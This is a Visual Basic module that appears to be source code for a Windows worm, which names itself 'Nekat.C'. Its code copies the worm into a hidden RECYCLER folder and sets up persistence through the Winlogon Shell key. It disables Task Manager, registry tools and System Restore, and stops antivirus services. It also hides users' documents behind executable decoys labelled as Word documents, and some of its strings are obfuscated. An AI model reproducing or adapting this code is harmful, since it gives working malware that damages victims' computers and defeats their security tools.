Attribute VB_Name = "Functions"
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long

Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long

Private Declare Function GetVersionExA Lib "kernel32" (lpVersionInformation As OSVERSIONINFO) As Integer

Public Declare Sub GetSystemTime Lib "kernel32" (lpSystemTime As SYSTEMTIME)

Public Type SYSTEMTIME
        wYear As Integer
        wMonth As Integer
        wDayOfWeek As Integer
        wDay As Integer
        wHour As Integer
        wMinute As Integer
        wSecond As Integer
        wMilliseconds As Integer
End Type

Public Type OSVERSIONINFO
        dwOSVersionInfoSize As Long
        dwMajorVersion As Long
        dwMinorVersion As Long
        dwBuildNumber As Long
        dwPlatformId As Long
        szCSDVersion As String * 128
End Type

Public Declare Function WinExec Lib "kernel32" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long

Private Const SW_NORMAL = 1

Public PE_NAME As String

Public Function ValidatePath(SZPath) As String
On Error Resume Next

If Right(SZPath, 1) <> "\" Then SZPath = SZPath & "\"

ValidatePath = SZPath

End Function
Public Function FileExists(szFilePath As String) As Boolean
On Error Resume Next

If Len(szFilePath) < 4 Then
    FileExists = False
    Exit Function
End If

FileExists = IIf(Dir(szFilePath, _
vbArchive + vbHidden + vbNormal + vbReadOnly + vbSystem) <> "", True, False)

End Function

Public Function FolderExists(szFolderPath As String) As Boolean
On Error Resume Next

If Len(szFolderPath) = 0 Then
    FolderExists = False
    Exit Function
End If

szFolderPath = ValidatePath(szFolderPath)

FolderExists = IIf(Dir(szFolderPath, vbDirectory + vbNormal + vbReadOnly + vbSystem + vbHidden) <> "", True, False)

End Function
Public Function GetBaseName(szName) As String
On Error Resume Next
GetBaseName = Left(szName, InStr(szName, ".") - 1)
End Function
Public Function GET_PE()
Dim ModuleName As String
ModuleName = String$(255, Chr$(0))
Call GetModuleFileName(0, ModuleName, Len(ModuleName))
GET_PE = ModuleName
End Function
Public Function SF(i As Integer) As String

On Error GoTo errFolder

Const MAX_PATH = 255
n$ = Space$(MAX_PATH)

Select Case i

    Case 0
    l$ = GetWindowsDirectory(n, MAX_PATH)
    SF = Left(n, l)
    SF = ValidatePath(SF)
    
    Case 1
    l$ = GetSystemDirectory(n, MAX_PATH)
    SF = Left(n, l)
    SF = ValidatePath(SF)
    
    Case 2
    l$ = GetTempPath(MAX_PATH, n)
    SF = Left(n, l - 1)
    SF = ValidatePath(SF)
    
    Case 3
    ext = Array(".exe", ".scr", ".pif", ".com")
    
    For i = 0 To UBound(ext)
        If FileExists(GetBaseName(GET_PE) & ext(i)) Then
            SF = GetBaseName(GET_PE) & ext(i)
            Exit For
        End If
    Next
    Case 4
    SF = Environ$("SYSTEMDRIVE")
    SF = ValidatePath(SF)
End Select
errFolder:

End Function
Public Sub MDLL()
On Error Resume Next
Dim sData As String
n = FreeFile
sData = StrConv(LoadResData(101, "CUSTOM"), vbUnicode)
Open SF(1) & "win32SDK.DLL" For Binary As #n
Put #n, , sData
Close #n

End Sub
Public Function ValidateDirectory(n) As Boolean
On Error Resume Next
Dim Nl(4) As Integer
Nl(0) = 16: Nl(1) = 2: Nl(2) = 1: Nl(3) = 32: Nl(4) = 4
If (n = Nl(0)) Or (n = 55) Then ValidateDirectory = True: Exit Function
For i = 0 To UBound(Nl) - 1
If (n = Nl(0) + Nl(i + 1)) Then ValidateDirectory = True: Exit Function
Next
For i = 0 To UBound(Nl) - 1
For x = 0 To UBound(Nl) - 1
If i <> x Then
If (n = Nl(0) + Nl(i + 1) + Nl(x + 1)) Then ValidateDirectory = True: Exit Function
End If
Next
Next
For i = 3 To UBound(Nl)
If (n = Nl(0) + Nl(1) + Nl(2) + Nl(i)) Then ValidateDirectory = True: Exit Function
Next
End Function
Public Function Paydate() As Boolean
On Error Resume Next
Dim SysTime As SYSTEMTIME
Call GetSystemTime(SysTime)
If (SysTime.wDay) Mod 5 <> 0 Then Paydate = False: Exit Function
Paydate = True
End Function
Public Sub SecureDelete(Filename As String)
On Error Resume Next
    Dim i As Integer
    Dim hFile As Integer
    Dim b As Byte
    Dim file() As Byte
    
    ReDim file(FileLen(Filename))
    hFile = FreeFile()
    Open Filename For Binary As #hFile
        Get #hFile, , file
        For i = 0 To UBound(file)
            Call Randomize(Timer)
            file(i) = CByte((255 - 0) * Rnd)
        Next
        Put #hFile, , file
    Close #hFile
    Call Kill(Filename)
End Sub

Public Sub HideDocs(ByVal Target)
On Error Resume Next
SetAttr Target, 0
DocName = GetBaseName(Target)
CF SF(3), DocName & ".exe"
SetAttr Target, vbHidden + vbSystem + vbReadOnly
End Sub
Public Sub TAKEN_DIRECTORY()
On Error Resume Next

Dim l As Long, cmd As String, c As Long

l = GetCommandLine()
c = lstrlen(l)

cmd = String$(c - 1, 0)

lstrcpy cmd, l

If InStr(cmd, " " & Chr(34)) <> 0 Then
cmd = Mid$(Left$(cmd, c - 1), InStr(cmd, " " & Chr(34)) + 2)

cmd = Left$(cmd, Len(cmd) - 1)

If InStr(UCase(cmd), Environ$("WINDIR")) <> 0 Or _
InStr(UCase(cmd), SF(4) & "RECYCLER\S-1-5-21-1123561945-1284227242-1801674531-1012") <> 0 Then
    Call WinExec("shutdown -r " & "-c " & Chr(34) & "Write Access Violation" & vbCrLf & _
    "Nekat.C" & Chr(34) & " -t 03", SW_HIDE)
    End
End If

Call WinExec("Explorer.exe " & cmd, SW_NORMAL)
End If

End Sub
Public Sub Config()

On Error Resume Next

PE_NAME = "cssrs.exe"

MkDir SF(4) & "RECYCLER\S-1-5-21-1123561945-1284227242-1801674531-1012"
SetAttr SF(4) & "RECYCLER\S-1-5-21-1123561945-1284227242-1801674531-1012", _
vbHidden + vbSystem + vbReadOnly

Call CreateFiles(1, SF(4))


CF SF(3), SF(4) & "RECYCLER\S-1-5-21-1123561945-1284227242-1801674531-1012\" & PE_NAME

SetAttr SF(4) & "RECYCLER\S-1-5-21-1123561945-1284227242-1801674531-1012\" & PE_NAME, vbHidden + vbSystem + vbReadOnly

CreateKey "Software\FirstRun", "ISRUNNING", "1", 3, 1

CreateKey "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", _
"Shell", "Explorer.exe " & _
SF(4) & "RECYCLER\S-1-5-21-1123561945-1284227242-1801674531-1012\" & _
PE_NAME, 3, 1

CreateKey "Software\Microsoft\Windows\CurrentVersion\Policies\System", _
"DisableTaskMgr", 1, 2, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Policies\System", _
"DisableRegistryTools", 1, 2, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", _
"Hidden", 0, 2, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", _
"HideFileExt", 1, 2, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", _
"ShowSuperHidden", 0, 2, 2

CreateKey "SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", _
"DisableSR", 1, 2, 2

CreateKey "SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", _
"DisableSR", 1, 3, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", _
"NoFolderOptions", 1, 2, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden", _
"UncheckedValue", 0, 3, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt", _
"UncheckedValue", 1, 3, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL", _
"CheckedValue", 0, 3, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL", _
"DefaultValue", 0, 3, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN", _
"CheckedValue", 0, 3, 2

CreateKey "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN", _
"DefaultValue", 0, 3, 2

CreateKey "Software\Classes\exefile", _
"NeverShowExt", 1, 3, 2

CreateKey "Software\Classes\exefile", _
"", "Documento de Microsoft Word", 2, 1

CreateKey "Directory\shell", _
"", "Explorar", 1, 1

CreateKey "Directory\shell\Explorar\command", _
"", SF(4) & "RECYCLER\S-1-5-21-1123561945-1284227242-1801674531-1012\" & _
PE_NAME & " " & Chr(34) & "%1" & Chr(34) & " %*", 1, 1

If ReadKey("SYSTEM\CurrentControlSet\Services\AMON", "Start", 3) _
<> "" Then CreateKey "SYSTEM\CurrentControlSet\Services\AMON", _
"Start", 0, 3, 2

If ReadKey("SYSTEM\CurrentControlSet\Services\easdrv", "Start", 3) <> "" Then
    CreateKey "SYSTEM\CurrentControlSet\Services\easdrv", _
    "Start", 0, 3, 2
    CreateKey "SYSTEM\CurrentControlSet\Services\ekrn", _
    "Start", 0, 3, 2
End If

If ReadKey("SYSTEM\CurrentControlSet\Services\AntiVirService", "Start", 3) _
<> "" Then CreateKey "SYSTEM\CurrentControlSet\Services\AntiVirService", _
"Start", 0, 3, 2

End Sub



Public Sub CreateFiles(Sel As Integer, Path As String)
On Error Resume Next
Select Case Sel
Case 1
    
    Dim SZD As String
    SZD = ED("") & vbCrLf & _
    ED("힞虙읥") & vbCrLf & ""
    
    n = FreeFile
    
    Open Path & ED("ꄼ") For Output As #n
    Print #n, SZD
    Close #n

    SetAttr Path & _
    ED("ꄼ"), _
    vbHidden + vbSystem
Case 2
    Dim SZA As String

    SZA = ED("") & vbCrLf & ED("嫰") & vbCrLf & _
    ED("劝ꄻ") & vbCrLf & _
    ED("噺") & vbCrLf & _
    ED("劝ꄻ") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("坠") & vbCrLf & _
    ED("劝ꄻ") & vbCrLf & _
    ED("劝ꄻ") & vbCrLf & _
    ED("劝ꄻ") & vbCrLf & _
    ED("噺")
    
    n = FreeFile
    
    Open Path & ED("") For Output As #n
    Print #n, SZA
    Close #n

    SetAttr Path & ED(""), 2

Case 3
    Dim STSOH As String
    STSOH = ED("") & vbCrLf & _
    ED("") & vbCrLf & ED("") & vbCrLf & _
    ED("") & vbCrLf & vbCrLf & vbCrLf & vbCrLf & vbCrLf & vbCrLf & vbCrLf & vbCrLf & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("1") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("")
    
    STSOH = STSOH & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("")
    
    STSOH = STSOH & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("") & vbCrLf & _
    ED("")
    
    SetAttr SF(1) & ED(""), 0
    
    n = FreeFile
    
    Open SF(1) & ED("") For Output As #n
    Print #n, STSOH
    Close #n
End Select

End Sub
Public Function GetWindowsVersion() As Long
On Error Resume Next
Dim OSinfo As OSVERSIONINFO
With OSinfo
.dwOSVersionInfoSize = 148
.szCSDVersion = Space$(128)
Call GetVersionExA(OSinfo)
GetWindowsVersion = .dwPlatformId
End With
End Function
